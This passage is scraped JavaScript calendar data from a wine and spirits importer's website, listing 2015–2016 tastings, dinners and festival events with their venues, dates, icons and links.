src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-happy-hour-at-jimmys-bodega/">Food &#038; Wine Classic in Aspen &#8211; Happy Hour at Jimmy&#8217;s Bodega</a><span></span>', start: ' 2016-06-17' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Diplo Midnight Express', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-diplo-midnight-express/">Food &#038; Wine Classic in Aspen &#8211; Diplo Midnight Express</a><span>DSWS House</span>', start: ' 2016-06-17' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Champagne &#038; Sake Night', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-champagne-sake-night/">Food &#038; Wine Classic in Aspen &#8211; Champagne &#038; Sake Night</a><span>DSWS House</span>', start: ' 2016-06-17' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; C&#038;V Late Hours', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-cv-late-hours/">Food &#038; Wine Classic in Aspen &#8211; C&#038;V Late Hours</a><span>DSWS House</span>', start: ' 2016-06-18' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; C&#038;V Aperitivo', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-cv-aperitivo/">Food &#038; Wine Classic in Aspen &#8211; C&#038;V Aperitivo</a><span>DSWS House</span>', start: ' 2016-06-18' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Lunch with Bobby Kacher', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-lunch-with-bobby-kacher/">Food &#038; Wine Classic in Aspen &#8211; Lunch with Bobby Kacher</a><span>DSWS House </span>', start: ' 2016-06-18' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Barolo Barbeque', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-barolo-barbeque/">Food &#038; Wine Classic in Aspen &#8211; Barolo Barbeque</a><span>DSWS House</span>', start: ' 2016-06-18' }, { title: 'Food &#038; Wine Classic in Aspen', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen/">Food &#038; Wine Classic in Aspen</a><span></span>', start: ' 2016-06-17' }, { title: 'AWS Wines of Burgundy Dinner', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/aws-wines-of-burgundy-dinner/">AWS Wines of Burgundy Dinner</a><span>The Inn at Cherry Creek</span>', start: ' 2016-06-15' }, { title: 'Napa Confidential', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/napa-confidential/">Napa Confidential</a><span>Forre & Co Fine Art</span>', start: ' 2016-06-17' }, { title: 'Mezcal- Mexico in a Bottle', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/mezcal-mexico-in-a-bottle/">Mezcal- Mexico in a Bottle</a><span>Casa Mezcal</span>', start: ' 2016-06-06' }, { title: 'Demystifying Sake at IWM', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/demystifying-sake-at-iwm/">Demystifying Sake at IWM</a><span>Italian Wine Merchants</span>', start: ' 2016-05-21' }, { title: 'Seminar and Tasting with ColleMassari', bg:'http://domaineselect.com/wp-content/uploads/2015/09/A-bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/A-bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/seminar-and-tasting-with-collemassari/">Seminar and Tasting with ColleMassari</a><span>Tannin Wine Bar</span>', start: ' 2016-04-23' }, { title: 'Velenosi at In Vino Veritas Palm Springs', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/velenosi-at-in-vino-veritas-palm-springs/">Velenosi at In Vino Veritas Palm Springs</a><span>Ritz-Carlton, Rancho Mirage</span>', start: ' 2016-04-24' }, { title: '&#8220;Armagnac: The Other French Brandy featuring Chateau du Tariquet&#8221;', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/armagnac-the-other-french-brandy-featuring-chateau-du-tariquet/">&#8220;Armagnac: The Other French Brandy featuring Chateau du Tariquet&#8221;</a><span>Pour Vous</span>', start: ' 2016-04-14' }, { title: 'Wine Riot in Boston with Chateau de Valcombe', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/wine-riot-in-boston-with-chateau-de-valcombe/">Wine Riot in Boston with Chateau de Valcombe</a><span>Boston</span>', start: ' 2016-04-22' }, { title: 'PIG ROAST AT BELLE SHOALS with WhistlePig', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/%ef%bb%bfpig-roast-at-belle-shoals-with-whistlepig/">PIG ROAST AT BELLE SHOALS with WhistlePig</a><span>Belle Shoals</span>', start: ' 2016-04-16' }, { title: 'Velenosi Wine Dinner at Scaramella&#8217;s Ristorante', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/velenosi-wine-dinner-at-scaramellas-ristorante/">Velenosi Wine Dinner at Scaramella&#8217;s Ristorante</a><span>Scaramellas Ristorante</span>', start: ' 2016-04-20' }, { title: 'Drink Me First: Apéritifs and Their Cocktails with Suze', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/drink-me-first-aperitifs-and-their-cocktails-with-suze/">Drink Me First: Apéritifs and Their Cocktails with Suze</a><span>Astor Center</span>', start: ' 2016-04-20' }, { title: 'Wine &#038; Spirits 2016 Top of the List NYC', bg:'http://domaineselect.com/wp-content/uploads/2015/09/A-bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/A-bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/wine-spirits-2016-top-of-the-list-nyc/">Wine &#038; Spirits 2016 Top of the List NYC</a><span>Event Block</span>', start: ' 2016-04-21' }, { title: 'Spirits Unlimited Toms River Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-unlimited-toms-river-tasting/">Spirits Unlimited Toms River Tasting</a><span>Spirits Unlimited</span>', start: ' 2016-04-15' }, { title: 'Joe Canals West Deptford Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/joe-canals-west-deptford-tasting/">Joe Canals West Deptford Tasting</a><span>Joe Canals West Deptford</span>', start: ' 2016-04-15' }, { title: 'Gerards Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/gerards-tasting/">Gerards Tasting</a><span>Gerards </span>', start: ' 2016-04-14' }, { title: 'Diva for a Day Charity Event Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diva-for-a-day-charity-event-tasting/">Diva for a Day Charity Event Tasting</a><span></span>', start: ' 2016-04-08' }, { title: 'Little Falls Beverage', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/little-falls-beverage/">Little Falls Beverage</a><span>Little Falls Beverage</span>', start: ' 2016-04-02' }, { title: 'Spirits Unlimited Middletown', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-unlimited-middletown/">Spirits Unlimited Middletown</a><span>Spirits Unlimited Middletown</span>', start: ' 2016-04-02' }, { title: 'Spirits Unlimited Red Bank', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-unlimited-red-bank/">Spirits Unlimited Red Bank</a><span>Spirits Unlimited</span>', start: ' 2016-04-01' }, { title: 'Pebble Beach Food &#038; Wine', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/pebble-beach-food-wine/">Pebble Beach Food &#038; Wine</a><span>California</span>', start: ' 2016-04-03' }, { title: 'Wine Dinner at Chef Josephs', bg:'http://domaineselect.com/wp-content/uploads/2015/07/kacher_toplogo.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/kacher_toplogo-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/wine-dinner-at-chef-josephs-2/">Wine Dinner at Chef Josephs</a><span>Chef Josephs</span>', start: ' 2016-04-06' }, { title: 'DSWS at VINITALY', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-at-vinitaly/">DSWS at VINITALY</a><span>Verona</span>', start: ' 2016-04-13' }, { title: 'Harrison Wine Vault Whiskey Festival', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/harrison-wine-vault-whiskey-festival/">Harrison Wine Vault Whiskey Festival</a><span>Harrison Wine Vault</span>', start: ' 2016-03-19' }, { title: 'DSWS at PROWEIN 2016', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa1.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa1-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-at-prowein-2016/">DSWS at PROWEIN 2016</a><span></span>', start: ' 2016-03-13' }, { title: 'Champagne Evening with Champagne Philippe Gonet', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/champagne-evening-with-champagne-philippe-gonet/">Champagne Evening with Champagne Philippe Gonet</a><span>The River Oyster Bar</span>', start: ' 2016-04-06' }, { title: 'Chateau de Valcombe at Wine Riot NYC', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa1.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa1-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/chateau-de-valcombe-at-wine-riot-nyc/">Chateau de Valcombe at Wine Riot NYC</a><span>69th Regiment Armory</span>', start: ' 2016-03-04' }, { title: 'Armagnac Event at Astor Center', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/armagnac-event-at-astor-center/">Armagnac Event at Astor Center</a><span>Astor Center</span>', start: ' 2016-03-08' }, { title: 'Taste of Sight', bg:'http://domaineselect.com/wp-content/uploads/2015/05/DSWS.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/05/DSWS-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/taste-of-sight/">Taste of Sight</a><span>City Winery NYC</span>', start: ' 2016-03-15' }, { title: 'Diplomatico at WhiskyFest New York', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-whiskyfest-new-york/">Diplomatico at WhiskyFest New York</a><span>New York Marriott Marquis</span>', start: ' 2016-11-01' }, { title: 'Diplomatico at WhiskyFest San Francisco', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-whiskyfest-san-francisco/">Diplomatico at WhiskyFest San Francisco</a><span>San Francisco Marriott Marquis</span>', start: ' 2016-09-23' }, { title: 'Diplomatico at WhiskyFest Chicago', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-whiskyfest-chicago/">Diplomatico at WhiskyFest Chicago</a><span>Hyatt Regency Chicago</span>', start: ' 2016-03-18' }, { title: 'Charleston Wine + Food', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/charleston-wine-food/">Charleston Wine + Food</a><span>Charleston, South Carolina</span>', start: ' 2016-03-06' }, { title: 'Lucano at Volta NY Show', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/lucano-at-volta-ny-show/">Lucano at Volta NY Show</a><span>Pier 90</span>', start: ' 2016-03-02' }, { title: 'Movia at James Beard House', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/movia-at-louies-portsmouth-dinner/">Movia at James Beard House</a><span>James Beard House</span>', start: ' 2016-02-19' }, { title: 'Yoho Beers Tasting at Gerards Wine &#038; Spirits', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/yoho-beers-tasting-at-gerards-wine-spirits/">Yoho Beers Tasting at Gerards Wine &#038; Spirits</a><span>Gerard Wine & Spirits</span>', start: ' 2016-02-13' }, { title: 'Alchemia Tasting at Spirits Unlimited', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/alchemia-tasting-at-spirits-unlimited/">Alchemia Tasting at Spirits Unlimited</a><span>Spirits Unlimited</span>', start: ' 2016-02-13' }, { title: '&#8220;Taste The World 2016&#8243; by Henry Wine Group', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/taste-the-world-2016-by-henry-wine-group-3/">&#8220;Taste The World 2016&#8243; by Henry Wine Group</a><span>Park Hyatt Aviara</span>', start: ' 2016-05-18' }, { title: '&#8220;Taste The World 2016&#8243; by Henry Wine Group', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/taste-the-world-2016-by-henry-wine-group-2/">&#8220;Taste The World 2016&#8243; by Henry Wine Group</a><span>The Beverly Hills Hotel</span>', start: ' 2016-05-17' }, { title: '“Taste The World 2016” by Henry Wine Group', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/taste-the-world-2016-by-henry-wine-group/">“Taste The World 2016” by Henry Wine Group</a><span>Fairmont San Francisco</span>', start: ' 2016-05-16' }, { title: 'VINISUD with Chateau de Valcombe', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/vinisud-with-chateau-de-valcombe/">VINISUD with Chateau de Valcombe</a><span>Parc des Expositions</span>', start: ' 2016-02-15' }, { title: 'COS &#038; Fleury at The Big Glou', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/cos-at-the-big-glou/">COS &#038; Fleury at The Big Glou</a><span>Wythe Hotel</span>', start: ' 2016-02-28' }, { title: 'Last Slinger Standing &#8211; Diplomatico Rum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/last-slinger-standing-diplomatico-rum/">Last Slinger Standing &#8211; Diplomatico Rum</a><span>“The Coop” at Culinary Dropout at The Yard at Farmer Arts District.</span>', start: ' 2016-02-15' }, { title: 'The Story of Rum Seminar &#8211; Diplomatico Rum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-story-of-rum-seminar-diplomatico-rum/">The Story of Rum Seminar &#8211; Diplomatico Rum</a><span>SANDS BUILDING HOTEL </span>', start: ' 2016-02-14' }, { title: 'Artisanal Market &#8211; Diplomatico Rum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/artisanal-market-diplomatico-rum/">Artisanal Market &#8211; Diplomatico Rum</a><span>SANDS BUILDING HOTEL</span>', start: ' 2016-02-15' }, { title: 'Hoboken Wine House Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/hoboken-wine-house-tasting/">Hoboken Wine House Tasting</a><span>Hoboken Wine House</span>', start: ' 2016-02-04' }, { title: 'Wineology Fine Wine &#038; Spirits Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/05/DSWS.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/05/DSWS-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/wineology-fine-wine-spirits-tasting/">Wineology Fine Wine &#038; Spirits Tasting</a><span>Wineology Fine Wine & Spirits </span>', start: ' 2016-02-13' }, { title: 'Cask on College', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/cask-on-college/">Cask on College</a><span>Cask on College</span>', start: ' 2016-02-07' }, { title: 'The Ultimate Guide to Italian Wine / Flos Olei 2016', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-ultimate-guide-to-italian-wine-flos-olei-2016/">The Ultimate Guide to Italian Wine / Flos Olei 2016</a><span>The Yale Club of New York City</span>', start: ' 2016-02-08' }, { title: 'Spirits Unlimited in Redbank', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-unlimited-in-redbank/">Spirits Unlimited in Redbank</a><span>Spirits Unlimited </span>', start: ' 2016-02-13' }, { title: 'Spirits Unlimited Middletown Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-unlimited-middletown-tasting/">Spirits Unlimited Middletown Tasting</a><span>Spirits Unlimited </span>', start: ' 2016-02-06' }, { title: 'Gambero Rosso Roadshow Seattle', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/gambero-rosso-roadshow-seattle/">Gambero Rosso Roadshow Seattle</a><span>Seattle Center</span>', start: ' 2016-02-16' }, { title: 'Tre Bicchieri San Francisco', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tre-bicchieri-san-francisco/">Tre Bicchieri San Francisco</a><span>Fort Mason Center</span>', start: ' 2016-02-11' }, { title: 'Tre Bicchieri NYC', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tre-bicchieri-nyc/">Tre Bicchieri NYC</a><span> Metropolitan Pavilion</span>', start: ' 2016-02-09' }, { title: 'Tre Bicchieri Chicago', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tre-bicchieri-chicago/">Tre Bicchieri Chicago</a><span>Bridgeport Art Center - Skyline Loft</span>', start: ' 2016-02-04' }, { title: 'Slow Wine NYC', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/slow-wine-nyc/">Slow Wine NYC</a><span>Highline Ballroom</span>', start: ' 2016-02-03' }, { title: 'Great Wines of Italy San Francisco', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/great-wines-of-italy-san-francisco/">Great Wines of Italy San Francisco</a><span>Golden Gate Club</span>', start: ' 2016-02-28' }, { title: 'Great Wines of Italy Los Angeles', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/great-wines-of-italy-los-angeles/">Great Wines of Italy Los Angeles</a><span>Petersen Automotive Museum</span>', start: ' 2016-02-25' }, { title: 'Great Wines of Italy New York City', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/great-wines-of-italy-new-york-city/">Great Wines of Italy New York City</a><span>IAC Building</span>', start: ' 2016-02-23' }, { title: 'A+ Pure Wines at The Beard House Dinner', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/a-pure-wines-at-the-beard-house-dinner/">A+ Pure Wines at The Beard House Dinner</a><span>James Beard House</span>', start: ' 2016-01-21' }, { title: 'Charity Wine Tasting by Gerards Wine &#038; Spirits', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/charity-wine-tasting-by-gerards-wine-spirits/">Charity Wine Tasting by Gerards Wine &#038; Spirits</a><span>Crystal Point Yacht Club</span>', start: ' 2016-01-29' }, { title: 'DSWS Grand Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-grand-portfolio-tasting/">DSWS Grand Portfolio Tasting</a><span>Four Seasons Restaurant </span>', start: ' 2016-01-19' }, { title: 'Naples Winter Wine Festival with Remirez de Ganuza', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/10835/">Naples Winter Wine Festival with Remirez de Ganuza</a><span>Naples, Florida</span>', start: ' 2016-01-29' }, { title: 'The Great Gatsby Party NYC with Suze Liqueur', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-great-gatsby-party-nyc-with-suze-liqueur/">The Great Gatsby Party NYC with Suze Liqueur</a><span>Capitale</span>', start: ' 2015-12-05' }, { title: 'Holiday Spirits Bazaar with Diplomatico, G&#8217;Vine and Lucano', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/holiday-spirits-bazaar-with-diplomatico-gvine-and-lucano/">Holiday Spirits Bazaar with Diplomatico, G&#8217;Vine and Lucano</a><span>Bowery Hotel</span>', start: ' 2015-11-19' }, { title: 'Fairview Wines &#038; Spirits Tastings', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img 